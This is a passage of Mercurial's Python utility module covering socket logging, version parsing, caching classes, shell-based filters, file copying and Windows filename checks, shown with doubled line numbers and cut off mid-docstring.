982 982 def recvfrom_into(self, res, buf, size, flags=0):
983 983 if not self.reads:
984 984 return
985 985
986 986 if self.logdataapis:
987 987 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
988 988 self.name, size, flags, res[0]))
989 989
990 990 self._writedata(buf[0:res[0]])
991 991
992 992 def recv_into(self, res, buf, size=0, flags=0):
993 993 if not self.reads:
994 994 return
995 995
996 996 if self.logdataapis:
997 997 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
998 998 self.name, size, flags, res))
999 999
1000 1000 self._writedata(buf[0:res])
1001 1001
1002 1002 def send(self, res, data, flags=0):
1003 1003 if not self.writes:
1004 1004 return
1005 1005
1006 1006 self.fh.write('%s> send(%d, %d) -> %d' % (
1007 1007 self.name, len(data), flags, len(res)))
1008 1008 self._writedata(data)
1009 1009
1010 1010 def sendall(self, res, data, flags=0):
1011 1011 if not self.writes:
1012 1012 return
1013 1013
1014 1014 if self.logdataapis:
1015 1015 # Returns None on success. So don't bother reporting return value.
1016 1016 self.fh.write('%s> sendall(%d, %d)' % (
1017 1017 self.name, len(data), flags))
1018 1018
1019 1019 self._writedata(data)
1020 1020
1021 1021 def sendto(self, res, data, flagsoraddress, address=None):
1022 1022 if not self.writes:
1023 1023 return
1024 1024
1025 1025 if address:
1026 1026 flags = flagsoraddress
1027 1027 else:
1028 1028 flags = 0
1029 1029
1030 1030 if self.logdataapis:
1031 1031 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1032 1032 self.name, len(data), flags, address, res))
1033 1033
1034 1034 self._writedata(data)
1035 1035
1036 1036 def setblocking(self, res, flag):
1037 1037 if not self.states:
1038 1038 return
1039 1039
1040 1040 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1041 1041
1042 1042 def settimeout(self, res, value):
1043 1043 if not self.states:
1044 1044 return
1045 1045
1046 1046 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1047 1047
1048 1048 def gettimeout(self, res):
1049 1049 if not self.states:
1050 1050 return
1051 1051
1052 1052 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1053 1053
1054 1054 def setsockopt(self, level, optname, value):
1055 1055 if not self.states:
1056 1056 return
1057 1057
1058 1058 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1059 1059 self.name, level, optname, value))
1060 1060
1061 1061 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1062 1062 logdata=False, logdataapis=True):
1063 1063 """Turn a socket into a logging socket."""
1064 1064
1065 1065 observer = socketobserver(logh, name, reads=reads, writes=writes,
1066 1066 states=states, logdata=logdata,
1067 1067 logdataapis=logdataapis)
1068 1068 return socketproxy(fh, observer)
1069 1069
1070 1070 def version():
1071 1071 """Return version information if available."""
1072 1072 try:
1073 1073 from . import __version__
1074 1074 return __version__.version
1075 1075 except ImportError:
1076 1076 return 'unknown'
1077 1077
1078 1078 def versiontuple(v=None, n=4):
1079 1079 """Parses a Mercurial version string into an N-tuple.
1080 1080
1081 1081 The version string to be parsed is specified with the ``v`` argument.
1082 1082 If it isn't defined, the current Mercurial version string will be parsed.
1083 1083
1084 1084 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1085 1085 returned values:
1086 1086
1087 1087 >>> v = b'3.6.1+190-df9b73d2d444'
1088 1088 >>> versiontuple(v, 2)
1089 1089 (3, 6)
1090 1090 >>> versiontuple(v, 3)
1091 1091 (3, 6, 1)
1092 1092 >>> versiontuple(v, 4)
1093 1093 (3, 6, 1, '190-df9b73d2d444')
1094 1094
1095 1095 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1096 1096 (3, 6, 1, '190-df9b73d2d444+20151118')
1097 1097
1098 1098 >>> v = b'3.6'
1099 1099 >>> versiontuple(v, 2)
1100 1100 (3, 6)
1101 1101 >>> versiontuple(v, 3)
1102 1102 (3, 6, None)
1103 1103 >>> versiontuple(v, 4)
1104 1104 (3, 6, None, None)
1105 1105
1106 1106 >>> v = b'3.9-rc'
1107 1107 >>> versiontuple(v, 2)
1108 1108 (3, 9)
1109 1109 >>> versiontuple(v, 3)
1110 1110 (3, 9, None)
1111 1111 >>> versiontuple(v, 4)
1112 1112 (3, 9, None, 'rc')
1113 1113
1114 1114 >>> v = b'3.9-rc+2-02a8fea4289b'
1115 1115 >>> versiontuple(v, 2)
1116 1116 (3, 9)
1117 1117 >>> versiontuple(v, 3)
1118 1118 (3, 9, None)
1119 1119 >>> versiontuple(v, 4)
1120 1120 (3, 9, None, 'rc+2-02a8fea4289b')
1121 1121 """
1122 1122 if not v:
1123 1123 v = version()
1124 1124 parts = remod.split('[\+-]', v, 1)
1125 1125 if len(parts) == 1:
1126 1126 vparts, extra = parts[0], None
1127 1127 else:
1128 1128 vparts, extra = parts
1129 1129
1130 1130 vints = []
1131 1131 for i in vparts.split('.'):
1132 1132 try:
1133 1133 vints.append(int(i))
1134 1134 except ValueError:
1135 1135 break
1136 1136 # (3, 6) -> (3, 6, None)
1137 1137 while len(vints) < 3:
1138 1138 vints.append(None)
1139 1139
1140 1140 if n == 2:
1141 1141 return (vints[0], vints[1])
1142 1142 if n == 3:
1143 1143 return (vints[0], vints[1], vints[2])
1144 1144 if n == 4:
1145 1145 return (vints[0], vints[1], vints[2], extra)
1146 1146
1147 1147 def cachefunc(func):
1148 1148 '''cache the result of function calls'''
1149 1149 # XXX doesn't handle keywords args
1150 1150 if func.__code__.co_argcount == 0:
1151 1151 cache = []
1152 1152 def f():
1153 1153 if len(cache) == 0:
1154 1154 cache.append(func())
1155 1155 return cache[0]
1156 1156 return f
1157 1157 cache = {}
1158 1158 if func.__code__.co_argcount == 1:
1159 1159 # we gain a small amount of time because
1160 1160 # we don't need to pack/unpack the list
1161 1161 def f(arg):
1162 1162 if arg not in cache:
1163 1163 cache[arg] = func(arg)
1164 1164 return cache[arg]
1165 1165 else:
1166 1166 def f(*args):
1167 1167 if args not in cache:
1168 1168 cache[args] = func(*args)
1169 1169 return cache[args]
1170 1170
1171 1171 return f
1172 1172
1173 1173 class cow(object):
1174 1174 """helper class to make copy-on-write easier
1175 1175
1176 1176 Call preparewrite before doing any writes.
1177 1177 """
1178 1178
1179 1179 def preparewrite(self):
1180 1180 """call this before writes, return self or a copied new object"""
1181 1181 if getattr(self, '_copied', 0):
1182 1182 self._copied -= 1
1183 1183 return self.__class__(self)
1184 1184 return self
1185 1185
1186 1186 def copy(self):
1187 1187 """always do a cheap copy"""
1188 1188 self._copied = getattr(self, '_copied', 0) + 1
1189 1189 return self
1190 1190
1191 1191 class sortdict(collections.OrderedDict):
1192 1192 '''a simple sorted dictionary
1193 1193
1194 1194 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1195 1195 >>> d2 = d1.copy()
1196 1196 >>> d2
1197 1197 sortdict([('a', 0), ('b', 1)])
1198 1198 >>> d2.update([(b'a', 2)])
1199 1199 >>> list(d2.keys()) # should still be in last-set order
1200 1200 ['b', 'a']
1201 1201 '''
1202 1202
1203 1203 def __setitem__(self, key, value):
1204 1204 if key in self:
1205 1205 del self[key]
1206 1206 super(sortdict, self).__setitem__(key, value)
1207 1207
1208 1208 if pycompat.ispypy:
1209 1209 # __setitem__() isn't called as of PyPy 5.8.0
1210 1210 def update(self, src):
1211 1211 if isinstance(src, dict):
1212 1212 src = src.iteritems()
1213 1213 for k, v in src:
1214 1214 self[k] = v
1215 1215
1216 1216 class cowdict(cow, dict):
1217 1217 """copy-on-write dict
1218 1218
1219 1219 Be sure to call d = d.preparewrite() before writing to d.
1220 1220
1221 1221 >>> a = cowdict()
1222 1222 >>> a is a.preparewrite()
1223 1223 True
1224 1224 >>> b = a.copy()
1225 1225 >>> b is a
1226 1226 True
1227 1227 >>> c = b.copy()
1228 1228 >>> c is a
1229 1229 True
1230 1230 >>> a = a.preparewrite()
1231 1231 >>> b is a
1232 1232 False
1233 1233 >>> a is a.preparewrite()
1234 1234 True
1235 1235 >>> c = c.preparewrite()
1236 1236 >>> b is c
1237 1237 False
1238 1238 >>> b is b.preparewrite()
1239 1239 True
1240 1240 """
1241 1241
1242 1242 class cowsortdict(cow, sortdict):
1243 1243 """copy-on-write sortdict
1244 1244
1245 1245 Be sure to call d = d.preparewrite() before writing to d.
1246 1246 """
1247 1247
1248 1248 class transactional(object):
1249 1249 """Base class for making a transactional type into a context manager."""
1250 1250 __metaclass__ = abc.ABCMeta
1251 1251
1252 1252 @abc.abstractmethod
1253 1253 def close(self):
1254 1254 """Successfully closes the transaction."""
1255 1255
1256 1256 @abc.abstractmethod
1257 1257 def release(self):
1258 1258 """Marks the end of the transaction.
1259 1259
1260 1260 If the transaction has not been closed, it will be aborted.
1261 1261 """
1262 1262
1263 1263 def __enter__(self):
1264 1264 return self
1265 1265
1266 1266 def __exit__(self, exc_type, exc_val, exc_tb):
1267 1267 try:
1268 1268 if exc_type is None:
1269 1269 self.close()
1270 1270 finally:
1271 1271 self.release()
1272 1272
1273 1273 @contextlib.contextmanager
1274 1274 def acceptintervention(tr=None):
1275 1275 """A context manager that closes the transaction on InterventionRequired
1276 1276
1277 1277 If no transaction was provided, this simply runs the body and returns
1278 1278 """
1279 1279 if not tr:
1280 1280 yield
1281 1281 return
1282 1282 try:
1283 1283 yield
1284 1284 tr.close()
1285 1285 except error.InterventionRequired:
1286 1286 tr.close()
1287 1287 raise
1288 1288 finally:
1289 1289 tr.release()
1290 1290
1291 1291 @contextlib.contextmanager
1292 1292 def nullcontextmanager():
1293 1293 yield
1294 1294
1295 1295 class _lrucachenode(object):
1296 1296 """A node in a doubly linked list.
1297 1297
1298 1298 Holds a reference to nodes on either side as well as a key-value
1299 1299 pair for the dictionary entry.
1300 1300 """
1301 1301 __slots__ = (u'next', u'prev', u'key', u'value')
1302 1302
1303 1303 def __init__(self):
1304 1304 self.next = None
1305 1305 self.prev = None
1306 1306
1307 1307 self.key = _notset
1308 1308 self.value = None
1309 1309
1310 1310 def markempty(self):
1311 1311 """Mark the node as emptied."""
1312 1312 self.key = _notset
1313 1313
1314 1314 class lrucachedict(object):
1315 1315 """Dict that caches most recent accesses and sets.
1316 1316
1317 1317 The dict consists of an actual backing dict - indexed by original
1318 1318 key - and a doubly linked circular list defining the order of entries in
1319 1319 the cache.
1320 1320
1321 1321 The head node is the newest entry in the cache. If the cache is full,
1322 1322 we recycle head.prev and make it the new head. Cache accesses result in
1323 1323 the node being moved to before the existing head and being marked as the
1324 1324 new head node.
1325 1325 """
1326 1326 def __init__(self, max):
1327 1327 self._cache = {}
1328 1328
1329 1329 self._head = head = _lrucachenode()
1330 1330 head.prev = head
1331 1331 head.next = head
1332 1332 self._size = 1
1333 1333 self._capacity = max
1334 1334
1335 1335 def __len__(self):
1336 1336 return len(self._cache)
1337 1337
1338 1338 def __contains__(self, k):
1339 1339 return k in self._cache
1340 1340
1341 1341 def __iter__(self):
1342 1342 # We don't have to iterate in cache order, but why not.
1343 1343 n = self._head
1344 1344 for i in range(len(self._cache)):
1345 1345 yield n.key
1346 1346 n = n.next
1347 1347
1348 1348 def __getitem__(self, k):
1349 1349 node = self._cache[k]
1350 1350 self._movetohead(node)
1351 1351 return node.value
1352 1352
1353 1353 def __setitem__(self, k, v):
1354 1354 node = self._cache.get(k)
1355 1355 # Replace existing value and mark as newest.
1356 1356 if node is not None:
1357 1357 node.value = v
1358 1358 self._movetohead(node)
1359 1359 return
1360 1360
1361 1361 if self._size < self._capacity:
1362 1362 node = self._addcapacity()
1363 1363 else:
1364 1364 # Grab the last/oldest item.
1365 1365 node = self._head.prev
1366 1366
1367 1367 # At capacity. Kill the old entry.
1368 1368 if node.key is not _notset:
1369 1369 del self._cache[node.key]
1370 1370
1371 1371 node.key = k
1372 1372 node.value = v
1373 1373 self._cache[k] = node
1374 1374 # And mark it as newest entry. No need to adjust order since it
1375 1375 # is already self._head.prev.
1376 1376 self._head = node
1377 1377
1378 1378 def __delitem__(self, k):
1379 1379 node = self._cache.pop(k)
1380 1380 node.markempty()
1381 1381
1382 1382 # Temporarily mark as newest item before re-adjusting head to make
1383 1383 # this node the oldest item.
1384 1384 self._movetohead(node)
1385 1385 self._head = node.next
1386 1386
1387 1387 # Additional dict methods.
1388 1388
1389 1389 def get(self, k, default=None):
1390 1390 try:
1391 1391 return self._cache[k].value
1392 1392 except KeyError:
1393 1393 return default
1394 1394
1395 1395 def clear(self):
1396 1396 n = self._head
1397 1397 while n.key is not _notset:
1398 1398 n.markempty()
1399 1399 n = n.next
1400 1400
1401 1401 self._cache.clear()
1402 1402
1403 1403 def copy(self):
1404 1404 result = lrucachedict(self._capacity)
1405 1405 n = self._head.prev
1406 1406 # Iterate in oldest-to-newest order, so the copy has the right ordering
1407 1407 for i in range(len(self._cache)):
1408 1408 result[n.key] = n.value
1409 1409 n = n.prev
1410 1410 return result
1411 1411
1412 1412 def _movetohead(self, node):
1413 1413 """Mark a node as the newest, making it the new head.
1414 1414
1415 1415 When a node is accessed, it becomes the freshest entry in the LRU
1416 1416 list, which is denoted by self._head.
1417 1417
1418 1418 Visually, let's make ``N`` the new head node (* denotes head):
1419 1419
1420 1420 previous/oldest <-> head <-> next/next newest
1421 1421
1422 1422 ----<->--- A* ---<->-----
1423 1423 | |
1424 1424 E <-> D <-> N <-> C <-> B
1425 1425
1426 1426 To:
1427 1427
1428 1428 ----<->--- N* ---<->-----
1429 1429 | |
1430 1430 E <-> D <-> C <-> B <-> A
1431 1431
1432 1432 This requires the following moves:
1433 1433
1434 1434 C.next = D (node.prev.next = node.next)
1435 1435 D.prev = C (node.next.prev = node.prev)
1436 1436 E.next = N (head.prev.next = node)
1437 1437 N.prev = E (node.prev = head.prev)
1438 1438 N.next = A (node.next = head)
1439 1439 A.prev = N (head.prev = node)
1440 1440 """
1441 1441 head = self._head
1442 1442 # C.next = D
1443 1443 node.prev.next = node.next
1444 1444 # D.prev = C
1445 1445 node.next.prev = node.prev
1446 1446 # N.prev = E
1447 1447 node.prev = head.prev
1448 1448 # N.next = A
1449 1449 # It is tempting to do just "head" here, however if node is
1450 1450 # adjacent to head, this will do bad things.
1451 1451 node.next = head.prev.next
1452 1452 # E.next = N
1453 1453 node.next.prev = node
1454 1454 # A.prev = N
1455 1455 node.prev.next = node
1456 1456
1457 1457 self._head = node
1458 1458
1459 1459 def _addcapacity(self):
1460 1460 """Add a node to the circular linked list.
1461 1461
1462 1462 The new node is inserted before the head node.
1463 1463 """
1464 1464 head = self._head
1465 1465 node = _lrucachenode()
1466 1466 head.prev.next = node
1467 1467 node.prev = head.prev
1468 1468 node.next = head
1469 1469 head.prev = node
1470 1470 self._size += 1
1471 1471 return node
1472 1472
1473 1473 def lrucachefunc(func):
1474 1474 '''cache most recent results of function calls'''
1475 1475 cache = {}
1476 1476 order = collections.deque()
1477 1477 if func.__code__.co_argcount == 1:
1478 1478 def f(arg):
1479 1479 if arg not in cache:
1480 1480 if len(cache) > 20:
1481 1481 del cache[order.popleft()]
1482 1482 cache[arg] = func(arg)
1483 1483 else:
1484 1484 order.remove(arg)
1485 1485 order.append(arg)
1486 1486 return cache[arg]
1487 1487 else:
1488 1488 def f(*args):
1489 1489 if args not in cache:
1490 1490 if len(cache) > 20:
1491 1491 del cache[order.popleft()]
1492 1492 cache[args] = func(*args)
1493 1493 else:
1494 1494 order.remove(args)
1495 1495 order.append(args)
1496 1496 return cache[args]
1497 1497
1498 1498 return f
1499 1499
1500 1500 class propertycache(object):
1501 1501 def __init__(self, func):
1502 1502 self.func = func
1503 1503 self.name = func.__name__
1504 1504 def __get__(self, obj, type=None):
1505 1505 result = self.func(obj)
1506 1506 self.cachevalue(obj, result)
1507 1507 return result
1508 1508
1509 1509 def cachevalue(self, obj, value):
1510 1510 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1511 1511 obj.__dict__[self.name] = value
1512 1512
1513 1513 def clearcachedproperty(obj, prop):
1514 1514 '''clear a cached property value, if one has been set'''
1515 1515 if prop in obj.__dict__:
1516 1516 del obj.__dict__[prop]
1517 1517
1518 1518 def pipefilter(s, cmd):
1519 1519 '''filter string S through command CMD, returning its output'''
1520 1520 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1521 1521 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1522 1522 pout, perr = p.communicate(s)
1523 1523 return pout
1524 1524
1525 1525 def tempfilter(s, cmd):
1526 1526 '''filter string S through a pair of temporary files with CMD.
1527 1527 CMD is used as a template to create the real command to be run,
1528 1528 with the strings INFILE and OUTFILE replaced by the real names of
1529 1529 the temporary files generated.'''
1530 1530 inname, outname = None, None
1531 1531 try:
1532 1532 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1533 1533 fp = os.fdopen(infd, r'wb')
1534 1534 fp.write(s)
1535 1535 fp.close()
1536 1536 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1537 1537 os.close(outfd)
1538 1538 cmd = cmd.replace('INFILE', inname)
1539 1539 cmd = cmd.replace('OUTFILE', outname)
1540 1540 code = os.system(cmd)
1541 1541 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1542 1542 code = 0
1543 1543 if code:
1544 1544 raise Abort(_("command '%s' failed: %s") %
1545 1545 (cmd, explainexit(code)))
1546 1546 return readfile(outname)
1547 1547 finally:
1548 1548 try:
1549 1549 if inname:
1550 1550 os.unlink(inname)
1551 1551 except OSError:
1552 1552 pass
1553 1553 try:
1554 1554 if outname:
1555 1555 os.unlink(outname)
1556 1556 except OSError:
1557 1557 pass
1558 1558
1559 1559 filtertable = {
1560 1560 'tempfile:': tempfilter,
1561 1561 'pipe:': pipefilter,
1562 1562 }
1563 1563
1564 1564 def filter(s, cmd):
1565 1565 "filter a string through a command that transforms its input to its output"
1566 1566 for name, fn in filtertable.iteritems():
1567 1567 if cmd.startswith(name):
1568 1568 return fn(s, cmd[len(name):].lstrip())
1569 1569 return pipefilter(s, cmd)
1570 1570
1571 1571 def binary(s):
1572 1572 """return true if a string is binary data"""
1573 1573 return bool(s and '\0' in s)
1574 1574
1575 1575 def increasingchunks(source, min=1024, max=65536):
1576 1576 '''return no less than min bytes per chunk while data remains,
1577 1577 doubling min after each chunk until it reaches max'''
1578 1578 def log2(x):
1579 1579 if not x:
1580 1580 return 0
1581 1581 i = 0
1582 1582 while x:
1583 1583 x >>= 1
1584 1584 i += 1
1585 1585 return i - 1
1586 1586
1587 1587 buf = []
1588 1588 blen = 0
1589 1589 for chunk in source:
1590 1590 buf.append(chunk)
1591 1591 blen += len(chunk)
1592 1592 if blen >= min:
1593 1593 if min < max:
1594 1594 min = min << 1
1595 1595 nmin = 1 << log2(blen)
1596 1596 if nmin > min:
1597 1597 min = nmin
1598 1598 if min > max:
1599 1599 min = max
1600 1600 yield ''.join(buf)
1601 1601 blen = 0
1602 1602 buf = []
1603 1603 if buf:
1604 1604 yield ''.join(buf)
1605 1605
1606 1606 Abort = error.Abort
1607 1607
1608 1608 def always(fn):
1609 1609 return True
1610 1610
1611 1611 def never(fn):
1612 1612 return False
1613 1613
1614 1614 def nogc(func):
1615 1615 """disable garbage collector
1616 1616
1617 1617 Python's garbage collector triggers a GC each time a certain number of
1618 1618 container objects (the number being defined by gc.get_threshold()) are
1619 1619 allocated even when marked not to be tracked by the collector. Tracking has
1620 1620 no effect on when GCs are triggered, only on what objects the GC looks
1621 1621 into. As a workaround, disable GC while building complex (huge)
1622 1622 containers.
1623 1623
1624 1624 This garbage collector issue have been fixed in 2.7. But it still affect
1625 1625 CPython's performance.
1626 1626 """
1627 1627 def wrapper(*args, **kwargs):
1628 1628 gcenabled = gc.isenabled()
1629 1629 gc.disable()
1630 1630 try:
1631 1631 return func(*args, **kwargs)
1632 1632 finally:
1633 1633 if gcenabled:
1634 1634 gc.enable()
1635 1635 return wrapper
1636 1636
1637 1637 if pycompat.ispypy:
1638 1638 # PyPy runs slower with gc disabled
1639 1639 nogc = lambda x: x
1640 1640
1641 1641 def pathto(root, n1, n2):
1642 1642 '''return the relative path from one place to another.
1643 1643 root should use os.sep to separate directories
1644 1644 n1 should use os.sep to separate directories
1645 1645 n2 should use "/" to separate directories
1646 1646 returns an os.sep-separated path.
1647 1647
1648 1648 If n1 is a relative path, it's assumed it's
1649 1649 relative to root.
1650 1650 n2 should always be relative to root.
1651 1651 '''
1652 1652 if not n1:
1653 1653 return localpath(n2)
1654 1654 if os.path.isabs(n1):
1655 1655 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1656 1656 return os.path.join(root, localpath(n2))
1657 1657 n2 = '/'.join((pconvert(root), n2))
1658 1658 a, b = splitpath(n1), n2.split('/')
1659 1659 a.reverse()
1660 1660 b.reverse()
1661 1661 while a and b and a[-1] == b[-1]:
1662 1662 a.pop()
1663 1663 b.pop()
1664 1664 b.reverse()
1665 1665 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1666 1666
1667 1667 def mainfrozen():
1668 1668 """return True if we are a frozen executable.
1669 1669
1670 1670 The code supports py2exe (most common, Windows only) and tools/freeze
1671 1671 (portable, not much used).
1672 1672 """
1673 1673 return (safehasattr(sys, "frozen") or # new py2exe
1674 1674 safehasattr(sys, "importers") or # old py2exe
1675 1675 imp.is_frozen(u"__main__")) # tools/freeze
1676 1676
1677 1677 # the location of data files matching the source code
1678 1678 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1679 1679 # executable version (py2exe) doesn't support __file__
1680 1680 datapath = os.path.dirname(pycompat.sysexecutable)
1681 1681 else:
1682 1682 datapath = os.path.dirname(pycompat.fsencode(__file__))
1683 1683
1684 1684 i18n.setdatapath(datapath)
1685 1685
1686 1686 _hgexecutable = None
1687 1687
1688 1688 def hgexecutable():
1689 1689 """return location of the 'hg' executable.
1690 1690
1691 1691 Defaults to $HG or 'hg' in the search path.
1692 1692 """
1693 1693 if _hgexecutable is None:
1694 1694 hg = encoding.environ.get('HG')
1695 1695 mainmod = sys.modules[r'__main__']
1696 1696 if hg:
1697 1697 _sethgexecutable(hg)
1698 1698 elif mainfrozen():
1699 1699 if getattr(sys, 'frozen', None) == 'macosx_app':
1700 1700 # Env variable set by py2app
1701 1701 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1702 1702 else:
1703 1703 _sethgexecutable(pycompat.sysexecutable)
1704 1704 elif (os.path.basename(
1705 1705 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1706 1706 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1707 1707 else:
1708 1708 exe = findexe('hg') or os.path.basename(sys.argv[0])
1709 1709 _sethgexecutable(exe)
1710 1710 return _hgexecutable
1711 1711
1712 1712 def _sethgexecutable(path):
1713 1713 """set location of the 'hg' executable"""
1714 1714 global _hgexecutable
1715 1715 _hgexecutable = path
1716 1716
1717 1717 def _testfileno(f, stdf):
1718 1718 fileno = getattr(f, 'fileno', None)
1719 1719 try:
1720 1720 return fileno and fileno() == stdf.fileno()
1721 1721 except io.UnsupportedOperation:
1722 1722 return False # fileno() raised UnsupportedOperation
1723 1723
1724 1724 def isstdin(f):
1725 1725 return _testfileno(f, sys.__stdin__)
1726 1726
1727 1727 def isstdout(f):
1728 1728 return _testfileno(f, sys.__stdout__)
1729 1729
1730 1730 def shellenviron(environ=None):
1731 1731 """return environ with optional override, useful for shelling out"""
1732 1732 def py2shell(val):
1733 1733 'convert python object into string that is useful to shell'
1734 1734 if val is None or val is False:
1735 1735 return '0'
1736 1736 if val is True:
1737 1737 return '1'
1738 1738 return pycompat.bytestr(val)
1739 1739 env = dict(encoding.environ)
1740 1740 if environ:
1741 1741 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1742 1742 env['HG'] = hgexecutable()
1743 1743 return env
1744 1744
1745 1745 def system(cmd, environ=None, cwd=None, out=None):
1746 1746 '''enhanced shell command execution.
1747 1747 run with environment maybe modified, maybe in different dir.
1748 1748
1749 1749 if out is specified, it is assumed to be a file-like object that has a
1750 1750 write() method. stdout and stderr will be redirected to out.'''
1751 1751 try:
1752 1752 stdout.flush()
1753 1753 except Exception:
1754 1754 pass
1755 1755 cmd = quotecommand(cmd)
1756 1756 env = shellenviron(environ)
1757 1757 if out is None or isstdout(out):
1758 1758 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1759 1759 env=env, cwd=cwd)
1760 1760 else:
1761 1761 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1762 1762 env=env, cwd=cwd, stdout=subprocess.PIPE,
1763 1763 stderr=subprocess.STDOUT)
1764 1764 for line in iter(proc.stdout.readline, ''):
1765 1765 out.write(line)
1766 1766 proc.wait()
1767 1767 rc = proc.returncode
1768 1768 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1769 1769 rc = 0
1770 1770 return rc
1771 1771
1772 1772 def checksignature(func):
1773 1773 '''wrap a function with code to check for calling errors'''
1774 1774 def check(*args, **kwargs):
1775 1775 try:
1776 1776 return func(*args, **kwargs)
1777 1777 except TypeError:
1778 1778 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1779 1779 raise error.SignatureError
1780 1780 raise
1781 1781
1782 1782 return check
1783 1783
1784 1784 # a whilelist of known filesystems where hardlink works reliably
1785 1785 _hardlinkfswhitelist = {
1786 1786 'btrfs',
1787 1787 'ext2',
1788 1788 'ext3',
1789 1789 'ext4',
1790 1790 'hfs',
1791 1791 'jfs',
1792 1792 'NTFS',
1793 1793 'reiserfs',
1794 1794 'tmpfs',
1795 1795 'ufs',
1796 1796 'xfs',
1797 1797 'zfs',
1798 1798 }
1799 1799
1800 1800 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1801 1801 '''copy a file, preserving mode and optionally other stat info like
1802 1802 atime/mtime
1803 1803
1804 1804 checkambig argument is used with filestat, and is useful only if
1805 1805 destination file is guarded by any lock (e.g. repo.lock or
1806 1806 repo.wlock).
1807 1807
1808 1808 copystat and checkambig should be exclusive.
1809 1809 '''
1810 1810 assert not (copystat and checkambig)
1811 1811 oldstat = None
1812 1812 if os.path.lexists(dest):
1813 1813 if checkambig:
1814 1814 oldstat = checkambig and filestat.frompath(dest)
1815 1815 unlink(dest)
1816 1816 if hardlink:
1817 1817 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1818 1818 # unless we are confident that dest is on a whitelisted filesystem.
1819 1819 try:
1820 1820 fstype = getfstype(os.path.dirname(dest))
1821 1821 except OSError:
1822 1822 fstype = None
1823 1823 if fstype not in _hardlinkfswhitelist:
1824 1824 hardlink = False
1825 1825 if hardlink:
1826 1826 try:
1827 1827 oslink(src, dest)
1828 1828 return
1829 1829 except (IOError, OSError):
1830 1830 pass # fall back to normal copy
1831 1831 if os.path.islink(src):
1832 1832 os.symlink(os.readlink(src), dest)
1833 1833 # copytime is ignored for symlinks, but in general copytime isn't needed
1834 1834 # for them anyway
1835 1835 else:
1836 1836 try:
1837 1837 shutil.copyfile(src, dest)
1838 1838 if copystat:
1839 1839 # copystat also copies mode
1840 1840 shutil.copystat(src, dest)
1841 1841 else:
1842 1842 shutil.copymode(src, dest)
1843 1843 if oldstat and oldstat.stat:
1844 1844 newstat = filestat.frompath(dest)
1845 1845 if newstat.isambig(oldstat):
1846 1846 # stat of copied file is ambiguous to original one
1847 1847 advanced = (
1848 1848 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1849 1849 os.utime(dest, (advanced, advanced))
1850 1850 except shutil.Error as inst:
1851 1851 raise Abort(str(inst))
1852 1852
1853 1853 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1854 1854 """Copy a directory tree using hardlinks if possible."""
1855 1855 num = 0
1856 1856
1857 1857 gettopic = lambda: hardlink and _('linking') or _('copying')
1858 1858
1859 1859 if os.path.isdir(src):
1860 1860 if hardlink is None:
1861 1861 hardlink = (os.stat(src).st_dev ==
1862 1862 os.stat(os.path.dirname(dst)).st_dev)
1863 1863 topic = gettopic()
1864 1864 os.mkdir(dst)
1865 1865 for name, kind in listdir(src):
1866 1866 srcname = os.path.join(src, name)
1867 1867 dstname = os.path.join(dst, name)
1868 1868 def nprog(t, pos):
1869 1869 if pos is not None:
1870 1870 return progress(t, pos + num)
1871 1871 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1872 1872 num += n
1873 1873 else:
1874 1874 if hardlink is None:
1875 1875 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1876 1876 os.stat(os.path.dirname(dst)).st_dev)
1877 1877 topic = gettopic()
1878 1878
1879 1879 if hardlink:
1880 1880 try:
1881 1881 oslink(src, dst)
1882 1882 except (IOError, OSError):
1883 1883 hardlink = False
1884 1884 shutil.copy(src, dst)
1885 1885 else:
1886 1886 shutil.copy(src, dst)
1887 1887 num += 1
1888 1888 progress(topic, num)
1889 1889 progress(topic, None)
1890 1890
1891 1891 return hardlink, num
1892 1892
1893 1893 _winreservednames = {
1894 1894 'con', 'prn', 'aux', 'nul',
1895 1895 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1896 1896 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1897 1897 }
1898 1898 _winreservedchars = ':*?"<>|'
1899 1899 def checkwinfilename(path):
1900 1900 r'''Check that the base-relative path is a valid filename on Windows.
1901 1901 Returns None if the path is ok, or a UI string describing the problem.
1902 1902
1903 1903 >>> checkwinfilename(b"just/a/normal/path")
1904 1904 >>> checkwinfilename(b"foo/bar/con.xml")
1905 1905 "filename contains 'con', which is reserved on Windows"
1906 1906 >>> checkwinfilename(b"foo/con.xml/bar")
1907 1907 "filename contains 'con', which is reserved on Windows"
1908 1908 >>> checkwinfilename(b"foo/bar/xml.con")
1909 1909 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
